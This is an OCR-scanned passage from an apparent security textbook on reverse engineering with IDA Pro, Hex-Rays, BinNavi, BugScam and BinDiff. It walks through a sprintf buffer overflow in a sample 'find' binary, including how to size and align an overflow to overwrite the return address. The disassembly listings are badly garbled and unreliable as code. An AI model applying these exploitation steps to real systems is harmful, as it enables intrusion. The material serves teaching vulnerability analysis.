To rename any variable, function, or location, simply click the name you want to 
change, and then use the Edit menu, or right-click for a context-sensitive menu to re- 
name the item to something more meaningful. Virtually every action in IDA Pro has an 
associated hotkey combination, and it pays to become familiar with the ones you use 
most frequently. The manner in which operands are displayed can also be changed via 
the Edit | Operand Type menu. Numeric operands can be displayed as hex, decimal, 



Figure 20-3 

IDA Pro naming 
and commenting 









* text : UUU15D3F 


push 


offset PewiceUbiect ; int 


•*> 


• text:oooi5D44 


call 


sub 14750 




* text : 0O015D49 


now 


edi, eax 




’ text : 0O015D4B 


test 


edi. edi 




* text:oooi5D4D 


n 


IOC 15E05 




* fpxt 100015053 


mnu 


prii , ris :Rtl Ini Mini r.nripStri ng 




• text : 00015D59 | 


lea 


ecx, [csp*74h*SynbolicLinl<Nane .Buffer] 




* text : 00015D5D 


lea 


edx, [esp*(l8h] 




* tpxf: 000150*1 


push 


pnx ; Sniirr.pStHng 




’ text : 00015D62 


push 


edx ; Destinationstring 




* text : 00015D63 


call 


edi ; RtllnltUnlcodeStrlng 




* lexl : 000150*5 


1 Hrf 


pax, [hs|uH] 
ecx, [esp*|] 




• text : 00015D69 


lea 




' text:uuimD6D 


push 


eax ; sourcestring 




* ipxi rnnmsDAF 


|iush 


hi:x ; DpsI iual iuuSI r imj 




* text : 00015D6T 


call 


edi ; RtllnitUnicodeString 




* text: 


lea 


edx, |esp*pil 
pax, [ps|i«|] 




* lexl :onni5075 


1 PH 




* text : 00015D79 


push 


edx ; DewiceHane 




* text : uuui5D/0 


push 


eax ; SynbolicLinkNane 




* text: 0001507B 


call 


ds : IuCredleSyi'ilrulicLink 




* text : 0O015D81 


now 


edi, eax 




• tCXt:UUU1bD83 


now 


eax, offset loc I5«nu 




* text : 00015088 


Lest 


edi, edi 




* text : 0O015D8A 


now 


[esi*0A4h], eax 


- 


' — — — ■■ — 


> 
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Figure 20-4 

IDA Pro stack 
frame prior to 
type consolidation 



/131995m 


mam 


- 




FFFFFFCB 


db 


? 


undefined 


A 


FFFFFFCC 


db 


? 


undefined 




FFFFFFCD 


db 


? 


undefined 




FFFFFFCE 


db 


? 


undefined 




FFFFFFCF 


db 


? 


undefined 




FFFFFFD 0 


db 


? 


undefined 




FFFFFFD1 


db 


? 


undefined 




FFFFFFD2 


db 


? 


undefined 




FFFFFF03 


db 


? 


undefined 




FFFFFFDk war 2C 


dd 


? 






FFFFFFD8 


db 


? 


undefined 




FFFFFFD9 


db 


? 


undefined 




FFFFFFDA 


db 


? 


undefined 




FFFFFFDB 


db 


? 


undefined 




FFFFFFDC 


db 


? 


undefined 


V 


< 








> 


b^+UUUUUtfiA 











octal, binary, or character values. Contiguous blocks of data can be organized as arrays 
to provide more compact and readable displays (Edit | Array). This is particularly useful 
when organizing and analyzing stack frame layouts, as shown in Figure 20-4 and Figure 
20-5. The stack frame for any function can be viewed in more detail by double-clicking 
any stack variable reference in the function's disassembly. 

Finally, another useful feature of IDA Pro is the ability to define structure templates 
and apply those templates to data in the disassembly. Structures are declared in the 
Structures subview (View | Open Subviews | Structures) and applied using the Edit | 
Struct Var menu option. Figure 20-6 shows two structures and their associated data 
fields. 

Once a structure type has been applied to a block of data, disassembly references 
within the block can be displayed using structure offset names, rather than more cryptic 
numeric offsets. Figure 20-7 is a portion of a disassembly that makes use of IDA Pro's 
structure declaration capability. The local variable sa has been declared as a sockaddr_ 
in struct, and the local variable hostent represents a pointer to a hostent structure. 



Figure 20-5 

IDA Pro stack 
frame after type 
consolidation 



/ES9H9B 




FFFFFF98 ; 


A, 


FFFFFF98 




FFFFFF98 uar 68 


dd ? 


FFFFFF9C 


dD ? ; undefined 


FFFFFF9D 


db ? ; undefined 


FFFFFF9E 


dD ? ; undefined 


FFFFFF9F 


db ? ; undefined 


iFFFFFFflO SgnDOllcLlnkNane UNICODE STRING ? 


FFFFFFA8 DeviceNane 


UNICODE STRING ? 


FFFFFFBO sourcestrinq 


dw 18 dup(?) 


FFFFFFD4 uar 2C 


dw 22 dup(?) 


oooooooo r 


db 4 dup(?) 


0000000*1 arg 0 


dd ? 


00000008 




00000008 ; end of stack 


variables v 


< 


> 


|SP+OOOOQOQ4 
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Figure 20-6 


Structures 




fpm 


IDA Pro structure 


w a an x « 








definition window 


00000000 : 

00000000 

oooooooo sockaddr In 
uuuuuuuu sin_t-amiiii 
0000000 ? sin_pnrt 
OOOOOOOU bill dUUr 
00000008 sin_zero 
ouuoooiu sockaddr in 
00000010 
nnnnnnnn - 


struc ; (sizeof=oxiO) 

dw ? 
rtu ? 
dd ? 

dD 8 dup(?) 
ends 








uuuuuuuu , 

UUUUUUUU 

00000000 hnstent 
00000000 li iidiie 

ooooooo'i h_ailases 
ouuuoouu h addrtype 
OOOOOOOR h length 
00000010 h dUUr list 
uuuuoui 4 hostent 
0000001 1| 


strur ; (si 7Pnf-0X1h) 

dd ? 
dd ? 
dd ? 
rid ¥ 
dd ? 
ends 








< ill 






> 




1 . sockaddr jrrOOOO 










NOTE The sockaddr_in and hostent data structures are used frequently 
in C/C++ for network programming. A sockaddr_in describes an Internet 
address, including host IP and port information. A hostent data structure is 
used to return the results of a DNS lookup to a C/C++ program. 



Disassemblies are made more readable when structure names are used rather than 
register plus offset syntax. For comparison, the operand at location 0804A2C8 has been 
left unaltered, while the same operand reference at location 0804A298 has been con- 
verted to the structure offset style and is clearly more readable as a field within a 
hostent struct. 



Figure 20-7 

Applying IDA Pro 
structure templates 



O IIM Viow-A 




EJSH 




.text :080 »i028»i loc 8040284: 
.text : 09040204 


sub 


; CODE XREF : main+28Btj 

esp, 8 


A 




.text : 08040287 


push 


10 






.text : 080UH289 


lea 


eax, [ebp+sa] 






.text : 0804028C 


push 


eax 






.text : 0904029D 


call 


bzero 






.text : 08040292 


dllU 


esp. IOIi 






.text : 08 Uh 02 yb 


mou 


eax, [ebp+nostent J 






.text : 08040298 


mou 


ax, word ptr [cax+hostent .hoddrtypc] 






.text : 0904029C 


now 


[ ebp • sa .sin_f anily ] . ax 






. text : 080402A0 


I'NJUIX 


eax, upurl 






.text: 08 Uii 02 R/ 


sub 


esp, 0 Uh 






.text: 0802*0200 


push 


eax 






.text : 0802*0200 


call 


_htons 






. 1 hx 1 : ORO4A7R0 


Hllll 


psp, ion 






.text: 08 U 2 i 02 B'd 


mou 


[ebp+sa .sin_port J , ax 






.text: O80402B7 


mou 


[cbp+sa.sin_addr] , 0 






.text : O8 02*02BE 


sub 


esp. 4 






. 1 HX 1 : 08 02 *A?r. 1 


|IIISll 


0 






.text:U 8 U 2 * 02 U'J 


push 


1 






.text : 08 02*0205 


mou 


eax, [cbp+hostcnt] 






.text : 08 02*02 08 


push 


dword ptr [eax+8] 






.rpxt : ns o**fl? r.R 


nail 


_snrkpt 






.text : 08 02(02 00 


add 


esp, lun 






.text : 080402D3 


mou 


febp+sock], eax 


V 




< 
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Vulnerability Discovery with IDA Pro The process of manually searching for 
vulnerabilities using IDA Pro is similar in many respects to searching for vulnerabilities 
in source code. A good start is to locate the places in which the program accepts user- 
provided input, and then attempt to understand how that input is used. It is helpful if 
IDA Pro has been able to identify calls to standard library functions. Because you are 
reading through an assembly language listing, it is likely that your analysis will take far 
longer than a corresponding read through source code. Use references for this activity, 
including appropriate assembly language reference manuals and a good guide to the 
APIs for all recognized library calls. It will be important for you to understand the effect 
of each assembly language instruction, as well as the requirements and results for calls 
to library functions. An understanding of basic assembly language code sequences as 
generated by common compilers is also essential. At a minimum, you should under- 
stand the following: 

• Function prologue code The first few statements of most functions used to 
set up the function's stack frame and allocate any local variables 

• Function epilogue code The last few statements of most functions used to 
clear the function's local variables from the stack and restore the caller's stack 
frame 

• Function calling conventions Dictate the manner in which parameters are 
passed to functions and how those parameters are cleaned from the stack once 
the function has completed 

• Assembly language looping and branching primitives The instructions 
used to transfer control to various locations within a function, often according 
to the outcome of a conditional test 

• High-level data structures Laid out in memory; various assembly language 
addressing modes are used to access this data 

Finishing Up with find.c Let's use IDA Pro to take a look at the sprintf() call that 
was flagged by all of the auditing tools used in this chapter. IDA Pro's disassembly list- 
ing leading up to the potentially vulnerable call at location 08049A8A is shown in 
Figure 20-8. In the example, variable names have been assigned for clarity. We have this 
luxury because we have seen the source code. If we had never seen the source code, we 
would be dealing with more generic names assigned during IDA Pro's initial analysis. 

It is perhaps stating the obvious at this point, but important nonetheless, to note 
that we are looking at compiled C code. One reason we know this, aside from having 
peeked at some of the source code already, is that the program is linked against the C 
standard library. An understanding of the C calling conventions helps us track down 
the parameters that are being passed to sprintf() here. First, the prototype for sprintfQ 
looks like this: 

int sprintf(char *str, const char *format, ...); 

The sprintfQ function generates an output string based on a supplied format string 
and optional data values to be embedded in the output string according to field speci- 
fications within the format string. The destination character array is specified by the 

https://www.facebook.eom/pages/Download-from-harks/1 2420175441 7002 




Chapter 20: Passive Analysis 

437 



Figure 20-8 

A potentially 
vulnerable call 
to sprintf)) 









mi 


.text:0G049A44 










.tCXt:08049A44 IOC 8049044: 




; UUPL JSKtl: monoqc 


request+n 




* .text : 08049A44 


sub 


esp, u 






• .tpxt : 08049A47 


push 


dsipiri 






* .text:08049A4D 


push 


offset aTnpri[nd D ; "/tnp/find .%d" 






* .tCXt:08 049A!>2 


loo 


cax, |cbp*outf| 






* .text:08049A58 


push 


eax 






* .tpxt : 08 049A59 


rail 


sprintf 






' .text:0G049A5C 


add 


esp. 10h 






* .text:U8U49G6i 


sub 


esp, 8 






* .text:08049A64 


lea 


eax, [ebp+outf] 






• .tpxt : 08 049Ai'iA 


push 


pax 






' .text:0G049A6D 


push 


[ebp* keyword] 






* .text : 08U49A/1 


push 


| ebp*filenane | 






* .text:08049fi77 


lea 


eax, [ebp+lnlt cwd] 






* .tpxt : 08 049A7D 


push 


pax 






' .text:0G049A7C 


push 


offset arindSHaneSCxec ; "find %s 


name \"%s\ 




* .text:U8U49A88 


lea 


eax, |ebp+cnd| 






* .text:08049A89 


push 


eax 






• -tpxt : 08 049ARA 


rail 


sprintf 






’ .text:0G049A8r 


add 


esp. 2 Oh 






* .text:08049A9^ 


sub 


esp, uuh 






• .text:08049A95 


lea 


eax, [ebp+end] 






* .text : 08049A9R 


push 


pax 






' .text : 06 049A9C 


call 


_systen 






< 








> 



first parameter, str. The format string is specified in the second parameter, format, and 
any required data values are specified as needed following the format string. The secu- 
rity problem with sprintfQ is that it doesn't perform length checking on the output 
string to determine whether it will fit into the destination character array. Since we have 
compiled C, we expect parameter passing to take place using the C calling conventions, 
which specify that parameters to a function call are pushed onto the stack in right-to- 
left order. 

This means that the first parameter to sprintfQ, str, is pushed onto the stack last. To 
track down the parameters supplied to this sprintfQ call, we need to work backward 
from the call itself. Each push statement that we encounter is placing an additional 
parameter onto the stack. We can observe six push statements following the previous 
call to sprintfQ at location 08049A59. The values associated with each push (in reverse 
order) are 

str: cmd 

format: "find %s -name \"%s\" -exec grep -H -n %s \\{\\} \\; > %s" 

stringl : init_cwd 

string2 : filename 

string3: keyword 

string4 : outf 

Strings 1 through 4 represent the four string parameters expected by the format 
string. The lea (Load Effective Address) instructions at locations 08049A64, 08049A77, 
and 08049A83 in Figure 20-8 compute the address of the variables outf, init_cwd, and 
cmd, respectively. This lets us know that these three variables are character arrays, while 
the fact that filename and keyword are used directly lets us know that they are character 
pointers. To exploit this function call, we need to know if this sprintfQ call can be 
made to generate a string not only larger than the size of the cmd array, but also large 
enough to reach the saved return address on the stack. Double-clicking any of the vari- 
ables just named will bring up the stack frame window for the manage_request() func- 
tion (which contains this particular sprintfQ call) centered on the variable that was 
clicked. The stack frame is displayed in Figure 20-9 with appropriate names applied and 
array aggregation already complete. 
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Figure 20-9 

The relevant stack 
arguments for 
sprintf() 











FFFEF7A8 


envstrings 


dd 


16 dup(?) 


[a 


FFFtF 


keyword 


dd 


V 




rrrerzee 


Filenane 


dd 


? 




FFFFF7F 0 


password 


dd 


? 




FFFEF7F4 


user 


dd 


? 




FFFEF7F8 


replybuf 


UU 


65536 Uup(?) 




1 FFFF/F8 


OlltF 


db 


51 2 dup(Y) 




FFFFF9F8 


end 


db 


512 dup(?)| 




FFFFFBF8 


lnlt cud 


db 


1032 dup(?) 




00000000 


s 


db 


*4 dup(?) 




0000000*4 


r 


■lli 


*4 ilti|i(?) 




00000008 


buf 


dd 


9 




0000000C 


sock 


dd 


? 




U00UU01U 


addr 


dd 


V 




0000001*4 










0000001*4 


; end of stack 


uariables 


V 


< 








> 


GP+000 10290 



Figure 20-9 indicates that the cmd buffer is 512 bytes long and that the 1032-byte 
init_cwd buffer lies between cmd and the saved return address at offset 00000004. 
Simple math tells us that we need sprintfQ to write 1552 bytes (512 for cmd, 1032 
bytes for init_cwd, 4 bytes for the saved frame pointer, and 4 bytes for the saved return 
address) of data into cmd to completely overwrite the return address. The sprintf() call 
we are looking at decompiles into the following C statement: 

sprintf (cmd, 

"find %s -name \"%s\" -exec grep -H -n %s \\{\\} \\; > %s", 
init_cwd, filename, keyword, outf ) ; 

We will cheat a bit here and rely on our earlier analysis of the find.c source code to 
remember that the filename and keyword parameters are pointers to user-supplied 
strings from an incoming UDP packet. Long strings supplied to either filename or 
keyword should get us a buffer overflow. Without access to the source code, we would 
need to determine where each of the four string parameters obtains its value. This is 
simply a matter of doing a little additional tracing through the manage_request() func- 
tion. Exactly how long does a filename need to be to overwrite the saved return 
address? The answer is somewhat less than the 1552 bytes mentioned earlier, because 
there are output characters sent to the cmd buffer prior to the fdename parameter. The 
format string itself contributes 13 characters prior to writing the filename into the out- 
put buffer, and the init_cwd string also precedes the fdename. The following code from 
elsewhere in manage_request() shows how init_cwd gets populated: 



text : 0804 9A12 


push 


1024 


text : 0804 9A17 


lea 


eax, [ebp+init 


text : 0804 9A1D 


push 


eax 


text : 0804 9A1E 


call 


getewd 



We see that the absolute path of the current working directory is copied into init_ 
cwd, and we receive a hint that the declared length of init_cwd is actually 1024 bytes, 
rather than 1032 bytes as Figure 20-9 seems to indicate. The reason for the difference is 
that IDA Pro displays the actual stack layout as generated by the compiler, which occa- 
sionally includes padding for various buffers. Using IDA Pro allows you to see the exact 
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layout of the stack frame, while viewing the source code only shows you the suggested 
layout. How does the value of init_cwd affect our attempt at overwriting the saved re- 
turn address? We may not always know what directory the find application has been 
started from, so we can't always predict how long the init_cwd string will be. We need 
to overwrite the saved return address with the address of our shellcode, so our shellcode 
offset needs to be included in the long filename argument that we will use to cause the 
buffer overflow. We need to know the length of init_cwd in order to properly align our 
offset within the filename. Since we don't know it, can the vulnerability be reliably 
exploited? The answer is to first include many copies of our offset to account for the 
unknown length of init_cwd and second, to conduct the attack in four separate UDP 
packets in which the byte alignment of the filename is shifted by one byte in each suc- 
cessive packet. One of the four packets is guaranteed to be aligned to properly overwrite 
the saved return address. 

Decompilation with Hex-Rays Decompiler A recent development in the 
decompilation field is Ilfak Guilfanov's Hex-Rays Decompiler plug-in for IDA Pro. 
Hex-Rays Decompiler integrates with IDA Pro to form a very powerful disassembly/ 
decompilation duo. The goal of Hex-Rays Decompiler is not to generate source code 
that is ready to compile. Rather, the goal is to produce source code that is sufficiently 
readable that analysis becomes significantly easier than disassembly analysis. Sample 
Hex-Rays Decompiler output is shown in the following listing, which contains the pre- 
viously discussed portions of the manage_request() function from the find binary: 

char v59; // [sp+10290h] [bp-608h]@76 

sprintf (&v59, "find %s -name \"%s\" -exec grep -H -n %s \\{\\} \\; > %s", 

&v 57, v43, buf, &v58); 
system ( &v59) ; 

While the variable names may not make things obvious, we can see that variable 
v59 is the destination array for the sprintfQ function. Furthermore, by observing the 
declaration of v59, we can see that the array sits 608h (1544) bytes above the saved 
frame pointer, which agrees precisely with the analysis presented earlier. We know the 
stack frame layout based on the Hex-Rays Decompiler-generated comment that indi- 
cates that v59 resides at memory location [bp-608h]. Hex-Rays Decompiler integrates 
seamlessly with IDA Pro and offers interactive manipulation of the generated source 
code in much the same way that the IDA Pro-generated disassembly can be manipu- 
lated. 

BinNavi 

Disassembly listings for complex programs can become very difficult to follow because 
program listings are inherently linear, whereas programs are very nonlinear as a result 
of all the branching operations that they perform. BinNavi from Zynamics is a tool that 
provides for graph-based analysis and debugging of binaries. BinNavi operates on IDA 
Pro-generated databases by importing them into a SQL database (MySQL is currently 
supported), and then offering sophisticated graph-based views of the binary. BinNavi 
utilizes the concept of proximity browsing to prevent the display from becoming too 
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cluttered. BinNavi graphs rely heavily on the concept of the basic block. A basic block is 
a sequence of instructions that, once entered, is guaranteed to execute in its entirety. 
The first instruction in any basic block is generally the target of a jump or call instruc- 
tion, while the last instruction in a basic block is typically either a jump or return. Basic 
blocks provide a convenient means for grouping instructions together in graph-based 
viewers, as each block can be represented by a single node within a function's flow- 
graph. Figure 20-10 shows a selected basic block and its immediate neighbors. 

The selected node has a single parent and two children. The proximity settings for 
this view are one node up and one node down. The proximity distance is configurable 
within BinNavi, allowing users to see more or less of a binary at any given time. Each 
time a new node is selected, the BinNavi display is updated to show only the neighbors 
that meet the proximity criteria. The goal of the BinNavi display is to decompose com- 
plex functions sufficiently to allow analysts to quickly comprehend the flow of those 
functions. 

References 

BinNavi www.zynamics.com/binnavi.html 

Hex- Rays Decompiler www.hex-rays.com/decompiler.shtml 

IDA Pro www.hex-rays.com/idapro/ 

Jad (JAva Decompiler) en.wikipedia.org/wiki/JAD_(JAva_Decompiler) 

JReversePro sourceforge.net/ proj ects/jrevpro/ 

Pentium x86 references en.wikipedia.org/wiki/Pentium_Dual-Core 
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Automated Binary Analysis Tools 

To automatically audit a binary for potential vulnerabilities, any tool must first under- 
stand the executable file format used by the binary be able to parse the machine lan- 
guage instructions contained within the binary, and finally determine whether the bi- 
nary performs any actions that might be exploitable. Such tools are far more specialized 
than source code auditing tools. For example, C source code can be automatically 
scanned no matter what target architecture the code is ultimately compiled for, whereas 
binary auditing tools need a separate module for each executable file format they are 
capable of interpreting, as well as a separate module for each machine language they 
can recognize. Additionally, the high-level language used to write the application and 
the compiler used to compile it can each influence what the compiled code looks like. 
Compiled C/C++ source code looks very different from compiled Delphi or Java code. 
The same source code compiled with two different compilers may possess many simi- 
larities but will also possess many differences. 

The major challenge for such products centers on the ability to accurately character- 
ize behavior that leads to an exploitable condition. Examples of such behaviors include 
access outside of allocated memory (whether in the stack or the heap), use of uninitial- 
ized variables, or passing user input directly to dangerous functions. To accomplish any 
of these tasks, an automated tool must be able to accurately compute ranges of values 
taken on by index variables and pointers, follow the flow of user-input values as they 
are used within the program, and track the initialization of all variables referenced by 
the program. Finally, to be truly effective, automated vulnerability discovery tools must 
be able to perform each of these tasks reliably while dealing with the many different 
algorithmic implementations used by both programmers and their compilers. Suffice it 
to say there have not been many entries into this holy grail of markets, and of those, 
most have been priced out of the average user's hands. 

We will briefly discuss three different tools that perform some form of automated 
binary analysis. Each of these tools takes a radically different approach to its analysis, 
which serves to illustrate the difficulty with automated analysis in general. The three 
tools are BugScam, from Thomas Dullien (aka Halvar Flake), Chevarista, from pseud- 
onymously named Tyler Durden, and BinDiff, from Zynamics. 

BugScam 

An early entry in this space, BugScam is a collection of scripts by Halvar Flake for use 
with IDA Pro. Two of the powerful features of IDA Pro are its scripting capabilities and 
its plug-in architecture. Both of these features allow users to extend the capabilities of 
IDA Pro and take advantage of the extensive analysis that IDA Pro performs on target 
binaries. Similar to the source code tools discussed earlier, BugScam scans for poten- 
tially insecure uses of functions that often lead to exploitable conditions. Unlike most 
of the source code scanners, BugScam attempts to perform some rudimentary data flow 
analysis to determine whether the function calls it identifies are actually exploitable. 
BugScam generates an HTML report containing the virtual addresses at which potential 
problems exist. Because the scripts are run from within IDA Pro, it is a relatively easy 
task to navigate to each trouble spot for further analysis of whether the indicated func- 
tion calls are actually exploitable. The BugScam scripts leverage the powerful analysis 
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capabilities of IDA Pro, which is capable of recognizing a large number of executable 
file formats as well as many machine languages. 

Sample BugScam output for the compiled find.c binary appears next: 



Code Analysis Report for find 

This is an automatically generated report on the frequency of misuse of 
certain known-to-be-problematic library functions in the executable file 
find. The contents of this file are automatically generated using simple 
heuristics, thus any reliance on the correctness of the statements in 
this file is your own responsibility. 

General Summary 

A total number of 7 library functions were analyzed. Counting all 
detectable uses of these library calls, a total of 3 was analyzed, of 
which 1 were identified as problematic. 

The complete list of problems 

Results for . sprintf 

The following table summarizes the results of the analysis of calls to 
the function .sprintf. 

Address Severity Description 

8049a8a 5 The maximum expansion of the data appears to be 

larger than the target buffer, this might be the 
cause of a buffer overrun ! 

Maximum Expansion: 1587 Target Size: 512 

Chevarista 

In issue 64 of Phrack, in an article entitled "Automated Vulnerability Auditing in Ma- 
chine Code," Tyler Durden introduced a tool named Chevarista. Chevarista is a proof- 
of-concept binary analysis tool implemented for the analysis of SPARC binaries. The 
tool is only available upon request from its author. The significant feature of the article 
is that it presents program analysis in a very formal manner and details the ways in 
which control flow analysis and data flow analysis can be combined to recognize flaws 
in compiled software. Some of the capabilities of Chevarista include interval analysis, 
which is used to deduce the range of values that variables can take on at runtime and 
allows the user to recognize out-of-range memory accesses, and state checking, which 
the author utilizes to detect memory leaks and double free conditions. The article's 
primary purpose is to present formal program analysis theory in a traditionally nonfor- 
mal venue in the hopes of sparking interest in this type of analysis. For more informa- 
tion, Durden invites readers to review follow-on work on the ERESI Reverse Engineer- 
ing Software Interface. 

BinDiff 

An alternative approach to locating vulnerabilities is to allow vendors to locate and fix 
the vulnerabilities themselves, and then, in the wake of a patch, to study exactly what 
has changed in the patched program. Under the assumption that patches either add 
completely new functionality or fix broken functionality, it can be useful to analyze 
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each change to determine if the modification addresses a vulnerable condition. By 
studying any safety checks implemented in the patch, it is possible to understand what 
types of malformed input might lead to exploits in the unpatched program. This can 
lead to the rapid development of exploits against unpatched systems. It is not uncom- 
mon to see exploits developed within 24 hours of the release of a vendor patch. Search- 
ing for vulnerabilities that have already been patched may not seem like the optimal 
way to spend your valuable research time, so why bother with difference analysis? The 
first reason is simply to be able to develop proof-of-concept exploits for use in pen- 
testing against unpatched clients. The second reason is to discover use patterns in vul- 
nerable software to locate identical patterns that a vendor may have forgotten to patch. 
In this second case, you are leveraging the fact that the vendor has pointed out what 
they were doing wrong, and all that is left is for you to determine is whether they have 
found and fixed all instances of their wrongful behavior. 

BinDiff from Zynamics is a tool that aims to speed up the process of locating and 
understanding changes introduced in patched binary files. Rather than scanning indi- 
vidual binaries for potential vulnerabilities, BinDiff, as its name implies, displays the 
differences between two versions of the same binary. You may think to yourself, "So 
what? Simple tools such as diff or cmp can display the differences between two files as 
well." What makes those tools less than useful for comparing two compiled binaries is 
that diff is primarily useful for comparing text files, and cmp can provide no contex- 
tual information surrounding any differences. BinDiff, on the other hand, focuses less 
on individual byte changes and more on structural or behavioral changes between suc- 
cessive versions of the same program. BinDiff combines disassembly with graph com- 
parison algorithms to compare the control flow graphs of successive versions of 
functions and highlights the newly introduced code in a display format similar to that 
of BinNavi. 

References 

"Automated Vulnerability Auditing in Machine Code (Tyler Durden) 

www.phrack.org/issues.html?issue=64&id=8 

BinDiff www.zynamics.com 

BugScam sourceforge.net/projects/bugscam 

ERESI Reverse Engineering Software Interface www.eresi-project.org 
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CHAPTER 



Advanced Static Analysis 
with IDA Pro 



In this chapter, you will be introduced to additional features of IDA Pro that will help 
you analyze binary code more efficiently and with greater confidence. Out of the box, 
IDA Pro is already one of the most powerful binary analysis tools available. The range 
of processors and binary file formats that IDA Pro can process is more than many users 
will ever need. Likewise, the disassembly view provides all of the capability that the 
majority of users will ever want. Occasionally, however, a binary will be sufficiently 
sophisticated or complex that you will need to take advantage of IDA Pro's advanced 
features to fully comprehend what the binary does. In other cases, you may find that 
IDA Pro does a large percentage of what you wish to do, and you would like to pick up 
from there with additional automated processing. Thus, in this chapter, we examine the 
following major topics: 

• Static analysis challenges 

• Extending IDA Pro 

Static Analysis Challenges 

For any nontrivial binary, generally several challenges must be overcome to make anal- 
ysis of that binary less difficult. Examples of challenges you might encounter include 

• Binaries that have been stripped of some or all of their symbol information 

• Binaries that have been linked with static libraries 

• Binaries that make use of complex, user-defined data structures 

• Compiled C++ programs that make use of polymorphism 

• Binaries that have been obfuscated in some manner to hinder analysis 

• Binaries that use instruction sets with which IDA Pro is not familiar 

• Binaries that use file formats with which IDA Pro is not familiar 

IDA Pro is equipped to deal with all of these challenges to varying degrees, though 
its documentation may not indicate that. One of the first things you need to learn to 
accept as an IDA Pro user is that there is no user's manual and the help files are pretty 
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terse. Familiarize yourself with the available online IDA Pro resources as, aside from 
your own hunting around and poking at IDA Pro, they will be your primary means of 
answering questions. Some sites that have strong communities of IDA Pro users include 
OpenRCE (www.openrce.org), Hex Blog (www.hexblog.com), and the IDA Pro support 
boards at the Hex-Rays website (see the "References" section at the end of the chapter 
for more details). 

Stripped Binaries 

The process of building software generally consists of several phases. In a typical C/C++ 
environment, you will encounter at a minimum the preprocessor, compilation, and 
linking phases before an executable can be produced. For follow-on phases to correctly 
combine the results of previous phases, intermediate fdes often contain information 
specific to the next build phase. For example, the compiler embeds into object files a lot 
of information that is specifically designed to assist the linker in doing its job of com- 
bining those object files into a single executable or library. Among other things, this 
information includes the names of all the functions and global variables within the 
object file. Once the linker has done its job, however, this information is no longer 
necessary. Quite frequently, all of this information is carried forward by the linker and 
remains present in the final executable file, where it can be examined by tools such as 
IDA Pro to learn what all the functions within a program were originally named. If we 
assume, which can be dangerous, that programmers tend to name functions and vari- 
ables according to their purpose, then we can learn a tremendous amount of informa- 
tion simply by having these symbol names available to us. 

The process of "stripping" a binary involves removing all symbol information that 
is no longer required once the binary has been built. Stripping is generally performed 
by using the command-line strip utility and, as a result of removing extraneous infor- 
mation, has the side effect of yielding a smaller binary. From a reverse-engineering 
perspective, however, stripping makes a binary slightly more difficult to analyze as a 
result of the loss of all the symbols. In this regard, stripping a binary can be seen as a 
primitive form of obfuscation. The most immediate impact of dealing with a stripped 
binary in IDA Pro is that IDA Pro will be unable to locate the main() function and will 
instead initially position the disassembly view at the program's true entry point, gener- 
ally named _start. 




NOTE Contrary to popular belief, main is not the first thing executed in 
a compiled C or C++ program. A significant amount of initialization must 
take place before control can be transferred to main. Some of the startup 
tasks include initialization of the C libraries, initialization of global objects, and 
creation of the argv and envp arguments expected by main. 



You will seldom desire to reverse-engineer all of the startup code added by the com- 
piler, so locating main is a handy thing to be able to do. Fortunately, each compiler 
tends to have its own style of initialization code, so with practice you will be able to 
recognize the compiler that was used based simply on the startup sequence. Since the 
last thing that the startup sequence does is transfer control to main, you should be able 
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to locate main easily regardless of whether a binary has been stripped. Listing 21-1 
shows the _start function for a gcc-compiled binary that has not been stripped. 



Listing 21-1 

_start proc near 



xor 


ebp, ebp 


pop 


esi 


mov 


ecx, esp 


and 


esp, OFFFFFFFOh 


push 


eax 


push 


esp 


push 


edx 


push 


offset libc csu fini 


push 


offset libc csu init 


push 


ecx 


push 


esi 


push 


offset main 


call 

hit 

endp 


libc start main 



Notice that main is not called directly; rather, it is passed as a parameter to the 

library function libc_start_main. The libc_start_main function takes care of libc 

initialization, pushing the proper arguments to main, and finally transferring control 

to main. Note that main is the last parameter pushed before the call to libc_start_ 

main. Listing 21-2 shows the _start function from the same binary after it has been 
stripped. 

Listing 2 1 -2 

start proc near 



xor 


ebp, ebp 


pop 


esi 


mov 


ecx, esp 


and 


esp, OFFFFFFFOh 


push 


eax 


push 


esp 


push 


edx 


push 


offset sub 804888C 


push 


offset sub 8048894 


push 


ecx 


push 


esi 


push 


offset loc 8048654 


call 

hit 

endp 


libc start main 



In this second case, we can see that IDA Pro no longer understands the name main. 
We also notice that two other function names have been lost as a result of the stripping 
operation, while one function has managed to retain its name. It is important to note 
that the behavior of _start has not been changed in any way by the stripping operation. 
As a result, we can apply what we learned from Listing 21-1, that main is the last argu- 
ment pushed to libc_start_main, and deduce that loc_8046854 must be the start 

address of main; we are free to rename loc_8046854 to main as an early step in our 
reversing process. 
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One question we need to understand the answer to is why libc_start_main has 

managed to retain its name while all the other functions we saw in Listing 21-1 lost 
theirs. The answer lies in the fact that the binary we are looking at was dynamically 

linked (the file command would tell us so) and libc_start_main is being imported 

from libc.so, the shared C library. The stripping process has no effect on imported or 
exported function and symbol names. This is because the runtime dynamic linker must 
be able to resolve these names across the various shared components required by the 
program. We will see in the next section that we are not always so lucky when we en- 
counter statically linked binaries. 



Statically Linked Programs and FLAIR 

When compiling programs that make use of library functions, the linker must be told 
whether to use shared libraries such as .dll or .so fdes, or static libraries such as .a files. 
Programs that use shared libraries are said to be dynamically linked, while programs 
that use static libraries are said to be statically linked. Each form of linking has its own 
advantages and disadvantages. Dynamic linking results in smaller executables and eas- 
ier upgrading of library components at the expense of some extra overhead when 
launching the binary, and the chance that the binary will not run if any required librar- 
ies are missing. To learn which dynamic libraries an executable depends on, you can 
use the dumpbin utility on Windows, ldd on Linux, and otool on Mac OS X. Each will 
list the names of the shared libraries that the loader must find in order to execute a 
given dynamically linked program. Static linking results in much larger binaries be- 
cause library code is merged with program code to create a single executable file that 
has no external dependencies, making the binary easier to distribute. As an example, 
consider a program that makes use of the OpenSSL cryptographic libraries. If this pro- 
gram is built to use shared libraries, then each computer on which the program is in- 
stalled must contain a copy of the OpenSSL libraries. The program would fail to execute 
on any computer that does not have OpenSSL installed. Statically linking that same 
program eliminates the requirement to have OpenSSL present on computers that will 
be used to run the program, making distribution of the program somewhat easier. 

From a reverse-engineering point of view, dynamically linked binaries are some- 
what easier to analyze, for several reasons. First, dynamically linked binaries contain 
little to no library code, which means that the code that you get to see in IDA Pro is just 
the code that is specific to the application, making it both smaller and easier to focus 
on application-specific code rather than library code. The last thing you want to do is 
spend your time reversing library code that is generally accepted to be fairly secure. 
Second, when a dynamically linked binary is stripped, it is not possible to strip the 
names of library functions called by the binary, which means the disassembly will con- 
tinue to contain useful function names in many cases. Statically linked binaries present 
more of a challenge because they contain far more code to disassemble, most of which 
